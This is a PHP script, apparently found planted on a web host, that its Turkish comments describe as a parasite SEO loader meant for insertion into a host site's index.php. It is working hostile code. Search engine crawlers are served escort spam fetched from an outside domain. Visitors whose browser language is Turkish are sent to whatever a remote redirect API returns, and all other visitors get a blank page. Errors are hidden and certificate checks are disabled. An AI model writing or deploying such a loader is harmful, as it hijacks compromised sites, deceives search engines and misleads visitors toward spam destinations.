File: /home/drspos/public_html/xyz.php
<?php
/**
* Parasite SEO Loader v2.0
* Çalışmazsa bu kodu kullan!
*
* Kullanım: Host sitenin index.php'sine koy
*
* Akış:
* - Googlebot → clk domain'den escort içeriği (e2)
* - TR kullanıcı → siteredirect API'den redirect
* - Diğer → boş
*/
error_reporting(0);
ini_set('display_errors', 0);
// ═══════════════════════════════════════
// CONFIG - Bunları güncelle
// ═══════════════════════════════════════
$clk_domain = 'https://samsun-textclk.lol';
$redirect_api = 'https://siteredirect.lol/aB9xZ3/redirect-api.php';
$redirect_path_replace = ['/yonlendirme.php', '/samsun']; // [eski, yeni]
// ═══════════════════════════════════════
$ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
$lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '');
// Googlebot kontrolü - sadece UA
if (preg_match('/Googlebot|bingbot|yandex|Slurp|DuckDuckBot|AdsBot|APIs-Google|Mediapartners|Google-InspectionTool/i', $ua)) {
$ch = curl_init($clk_domain . '/pg.php?q&t=e2');
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 15,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_FOLLOWLOCATION => true
]);
$content = curl_exec($ch);
curl_close($ch);
if ($content && strlen($content) > 500) {
echo $content;
exit;
}
}
// TR kullanıcı - redirect
if (strpos($lang, 'tr') !== false) {
$ch = curl_init($redirect_api);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_SSL_VERIFYPEER => false
]);
$resp = curl_exec($ch);
curl_close($ch);
$data = json_decode($resp, true);
if (isset($data['redirect_url'])) {
$url = str_replace($redirect_path_replace[0], $redirect_path_replace[1], $data['redirect_url']);
header('Location: ' . $url);
exit;
}
}
// Diğer kullanıcılar - boş sayfa
?>